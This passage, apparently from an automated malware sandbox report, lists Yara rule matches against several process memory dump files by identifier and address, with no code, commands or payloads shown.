                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.